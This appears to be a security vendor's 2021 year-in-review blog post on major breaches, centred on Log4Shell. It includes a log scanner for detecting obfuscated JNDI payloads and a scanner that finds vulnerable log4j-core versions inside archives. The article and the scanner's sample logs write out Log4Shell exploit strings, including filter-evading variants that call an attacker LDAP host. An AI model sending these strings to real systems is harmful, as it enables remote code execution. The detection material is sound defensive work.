Anatomy of a Breach

Anatomy of a Breach: 2021 Year in Review — Log4Shell, Colonial Pipeline, and the Year Ransomware Became a National Security Crisis

> series: anatomy_of_a_breach —— part: 156 —— year: 2021 —— verdict: ransomware_national_security_crisis —— closing: log4shell_the_vulnerability_in_everything

Hedgehog Security 31 December 2021 16 min read

2021: Colonial Pipeline. Irish HSE. Kaseya. And then Log4Shell broke everything.

On 9 December 2021, a critical remote code execution vulnerability — CVE-2021-44228, dubbed Log4Shell — was publicly disclosed in Apache Log4j 2, a ubiquitous open-source Java logging library used by hundreds of millions of applications and services worldwide. The vulnerability was trivially exploitable: any attacker-controlled string that a vulnerable version (2.0-beta9 through 2.14.1) happened to log could trigger a JNDI lookup to an attacker-controlled LDAP or RMI server and, from there, remote code execution. Within hours of disclosure, mass exploitation was observed globally. The NCSC issued urgent guidance, and security teams worldwide scrambled to identify and patch affected systems across their estates.

Log4Shell was the culmination of a year that had already established ransomware as a national security crisis. Colonial Pipeline shut down 45% of America's East Coast fuel through a compromised VPN password. The Irish HSE was devastated by Conti ransomware for four months. JBS paid $11 million to REvil. Kaseya's supply chain attack hit 1,500 businesses. Hafnium compromised 250,000 Exchange servers. And someone tried to poison Florida's water supply through TeamViewer. 2021 was the year cybersecurity became inseparable from national security, public safety, and the functioning of society.



Twelve months. The most dangerous year yet.

| # | Breach | Key Lesson |
|---|--------|------------|
| 145 | Mimecast | SolarWinds cascade reaches email security. Supply chain attacks propagate. |
| 146 | Oldsmar Water | Someone tried to poison a city's water via TeamViewer. Shared password. Windows 7. |
| 147 | Hafnium / Exchange | 250,000 Exchange servers. Four zero-days. Mass exploitation by multiple groups. |
| 148 | Facebook 533M | Phone numbers and personal data posted free online. €265M DPC fine. |
| 149 | Colonial Pipeline | 45% of US East Coast fuel. One password. No MFA. $4.4M paid. Executive Order. |
| 150 | Irish HSE + JBS | Healthcare + food supply. €100M HSE recovery. $11M JBS ransom. Both in May. |
| 151 | Kaseya VSA | Supply chain ransomware. 1,500 businesses. 800 supermarkets closed. $70M demand. |
| 152 | T-Mobile US | 40M+ records. Fifth breach. $500M settlement. 'Their security is awful.' |
| 153 | Epik | 180GB dump including WHOIS privacy data. Privacy service became the vulnerability. |
| 154 | Twitch | 128GB: entire source code, streamer earnings, internal tools. Server misconfiguration. |
| 155 | GoDaddy | 1.2M WordPress admin passwords stored in plaintext. SSL keys exposed. Two months. |
| 156 | Log4Shell + Year Review | CVE-2021-44228. The vulnerability in everything. Trivially exploitable. Universal impact. |

The vulnerability in everything.

Log4Shell was unlike any previous vulnerability in this series. Heartbleed affected OpenSSL. Shellshock affected Bash. EternalBlue affected Windows SMB. Log4Shell affected Log4j — a logging library so ubiquitous that most organisations did not even know which of their systems used it. The vulnerability was present in cloud services (AWS, Azure, GCP), enterprise software (VMware, Cisco, Oracle), game servers (Minecraft), and countless custom applications. The challenge was not patching — it was finding every instance of Log4j in every system, application, and dependency.

Ubiquity: Everywhere, Often Invisible
Log4j was embedded in applications as a transitive dependency — software depended on libraries that depended on Log4j, often without the application developer's knowledge. <a href="/vulnerability-scanning">Vulnerability scanning</a> identifies Log4j instances across your estate. Our <a href="/penetration-testing/web-application">application testing</a> identifies Log4j exposure in web applications.
Trivially Exploitable
Exploitation required only sending a specially crafted string (of the form ${jndi:ldap://attacker-controlled-host/payload}) to any input that was logged by a vulnerable Log4j instance. No authentication required. Exploitable through headers, form fields, user agents, usernames, and any other logged input. Within hours attackers were obfuscating the string with nested lookups (${${lower:j}ndi:...}) and URL-encoding to slip past naive filters. <a href="https://www.socinabox.co.uk">SOC in a Box</a> monitors for Log4Shell exploitation attempts.
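The detection side of the point above, as an added example for this article rather than SOC in a Box's own rules: the script normalises the obfuscations Log4Shell payloads arrived with (layered URL-encoding, ${lower:x}/${upper:x} and ${...:-x} single-character wrappers) and then matches one pattern over web-server access-log lines. The log lines, IP addresses and timestamps are constructed for the example.

```python
"""Flag Log4Shell exploitation attempts in application or web-server logs.

Added example for this article, not SOC in a Box detection content.  The
access-log lines it runs over are constructed for the example."""
import re
from urllib.parse import unquote

# The textbook payload is ${jndi:ldap://host/x}, but attackers quickly wrapped
# each character in nested lookups (${lower:j}, ${::-j}, ${env:NOPE:-j}) and
# URL-encoded the result.  Normalise first, then match a single pattern.
_SINGLE_CHAR_WRAPPERS = (
    re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.IGNORECASE),  # ${lower:J}
    re.compile(r"\$\{[^{}]*?:-([^{}])\}"),                        # ${::-j}, ${env:X:-j}
)
# Capture the whole lookup so the analyst sees the callback host and path.
JNDI = re.compile(r"\$\{\s*jndi\s*:[^}]*\}?", re.IGNORECASE)


def normalise(s: str) -> str:
    """Strip layered URL-encoding and collapse single-character lookup wrappers."""
    for _ in range(3):                        # bounded: avoids decode loops
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    previous = None
    while previous != s:                      # wrappers nest, so iterate to a fixpoint
        previous = s
        for pattern in _SINGLE_CHAR_WRAPPERS:
            s = pattern.sub(lambda m: m.group(1).lower(), s)
    return s


def is_log4shell_attempt(line: str) -> bool:
    return JNDI.search(normalise(line)) is not None


def scan(lines):
    """Return (line number, de-obfuscated JNDI lookup) for each suspicious line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = JNDI.search(normalise(line))
        if match:
            hits.append((number, match.group(0)))
    return hits


# Constructed sample access log: one benign request, three attempts of
# increasing obfuscation, and one non-JNDI lookup probe that must not match.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:15:01 +0000] '
    '"GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.23/o} HTTP/1.1" 400 0 "-" "curl/7.68"',
    '10.0.0.9 - - [10/Dec/2021:03:15:30 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D'
    '%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Aldap%3A%2F%2F198.51.100.23%2Fz%7D HTTP/1.1" 400 0 "-" "-"',
    '10.0.0.12 - - [10/Dec/2021:03:16:00 +0000] "GET /docs?q=${env:HOME} HTTP/1.1" 200 80 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, payload in scan(SAMPLE_LOGS):
        print(f"line {number}: {payload}")
```

Run it over application logs as well as the web tier: the payload only has to reach a log statement, so a username in an authentication log is as good a carrier as a User-Agent header. Normalisation narrows the evasion space but does not close it, which is why an outbound LDAP or RMI connection from an application server remains the more reliable signal of an attempt that actually fired.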
Software Supply Chain Visibility
Log4Shell demonstrated the critical importance of knowing what software dependencies your applications contain — a Software Bill of Materials (SBOM). Without visibility into transitive dependencies, organisations cannot know whether they are vulnerable. <a href="/cyber-essentials">Cyber Essentials</a> addresses software inventory and asset management.
Patching a Moving Target
The initial Log4j patch (2.15.0) was followed by 2.16.0 (CVE-2021-45046, an incomplete fix for the original issue), 2.17.0 (CVE-2021-45105, a denial of service through recursive lookups) and 2.17.1 (CVE-2021-44832, code execution via an attacker-controlled configuration) as further vulnerabilities were discovered — a patching cycle in which the target version moved four times in three weeks. Organisations that patched once and moved on were still exposed. <a href="/vulnerability-scanning">Continuous vulnerability scanning</a> ensures that evolving patches are applied as they become available.
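The three practical problems above (Log4j arriving as a transitive dependency, having no inventory of what an artefact contains, and a fix version that kept moving) come together in one task: open every deployed archive, find log4j-core wherever it is nested, record its version, and say which advisory still applies. The script below is an added example for this article, not a Hedgehog Security tool or the Apache project's code. It identifies log4j-core by the Maven pom.properties path and the JndiLookup.class entry inside the JAR, which survive renaming and shading; the version-to-advisory mapping follows the Apache Log4j security advisories for the Java 8+ line (the 2.12.x and 2.3.x back-ports are assumed out of scope). The WAR it scans is constructed in memory so it runs offline; the file names inside it are made up.

```python
"""Find Log4j 2 inside JAR/WAR/EAR archives, nested JARs included, and say
which advisory applies to the version found.

Added example for this article, not a Hedgehog Security tool.  The sample
WAR it scans is constructed in memory so the script runs offline."""
import io
import re
import zipfile
from pathlib import Path

# Two artefacts identify log4j-core regardless of the file name it was
# repackaged under (a shaded "uber JAR" usually renames nothing inside).
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def assess(version: str, jndi_present: bool = True) -> str:
    """Map a log4j-core version to the Apache advisory that still applies.
    Java 8+ line only; the 2.12.x (Java 7) and 2.3.x (Java 6) back-ports
    carry the same fixes under different numbers and are not modelled here."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        return "unknown version: inspect manually"
    v = (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))
    if v[0] != 2:
        return "not log4j 2.x: Log4Shell does not apply"
    if v < (2, 15, 0):
        if not jndi_present:   # the class-deletion workaround was applied
            return "JndiLookup.class removed: CVE-2021-44228 mitigated, still upgrade"
        return "CVE-2021-44228 (Log4Shell): upgrade"
    if v == (2, 15, 0):
        return "CVE-2021-45046: upgrade"
    if v == (2, 16, 0):
        return "CVE-2021-45105: upgrade"
    if v == (2, 17, 0):
        return "CVE-2021-44832: upgrade"
    return "fixed"


def _scan_archive(zf: zipfile.ZipFile, path: str, findings: list) -> None:
    names = set(zf.namelist())
    if POM_PROPS in names or JNDI_CLASS in names:
        version = "unknown"
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            hit = re.search(r"^version=(.+)$", props, re.MULTILINE)
            if hit:
                version = hit.group(1).strip()
        jndi = JNDI_CLASS in names
        findings.append({"path": path, "version": version,
                         "jndi_lookup_present": jndi,
                         "assessment": assess(version, jndi)})
    # Recurse into embedded archives: WEB-INF/lib/*.jar, fat JARs, EARs of WARs.
    for name in names:
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            _scan_archive(inner, f"{path}!/{name}", findings)


def scan_bytes(data: bytes, path: str) -> list:
    """Scan one archive held in memory; one finding per copy of log4j-core."""
    findings = []
    _scan_archive(zipfile.ZipFile(io.BytesIO(data)), path, findings)
    return findings


def scan_tree(root) -> list:
    """Walk a directory on disk, e.g. an application server's deployments."""
    findings = []
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in ARCHIVE_SUFFIXES:
            findings.extend(scan_bytes(p.read_bytes(), str(p)))
    return findings


def build_sample_war(log4j_version: str, keep_jndi: bool = True) -> bytes:
    """Constructed sample: a WAR whose WEB-INF/lib carries log4j-core as a
    transitive dependency that the application's own build file never named."""
    core = io.BytesIO()
    with zipfile.ZipFile(core, "w") as z:
        z.writestr(POM_PROPS, f"version={log4j_version}\nartifactId=log4j-core\n")
        if keep_jndi:
            z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder class bytes
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as z:
        z.writestr("WEB-INF/web.xml", "<web-app/>")
        z.writestr(f"WEB-INF/lib/log4j-core-{log4j_version}.jar", core.getvalue())
    return war.getvalue()


if __name__ == "__main__":
    for finding in scan_bytes(build_sample_war("2.14.1"), "app.war"):
        print(finding)
```

The list of findings is the inventory an SBOM would have given you up front: path, component, version. Point scan_tree at every host that runs Java and keep the output, because the assessment column is what changes as the fix version moves while the inventory itself stays valid.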

156 articles. 2009 to 2021. From lost CDs to the vulnerability in everything.

With 156 articles spanning thirteen years, the Anatomy of a Breach series has documented the complete evolution of the cyber threat landscape. The root causes remain unchanged: unpatched systems, weak authentication, misconfigured infrastructure, supply chain trust, and the persistent gap between security policy and implementation. The scale and consequences have grown from inconvenience to existential threat. The controls remain the same. The evidence is overwhelming. Test. Certify. Monitor. Prepare.


156 breaches. Thirteen years. Log4Shell. Colonial Pipeline. The evidence is overwhelming. Act now.

<a href="/penetration-testing">Test</a>. <a href="/cyber-essentials">Certify</a>. <a href="https://www.socinabox.co.uk">Monitor</a>. <a href="https://www.cyber-defence.io">Prepare</a>. Thirteen years of evidence demands nothing less.
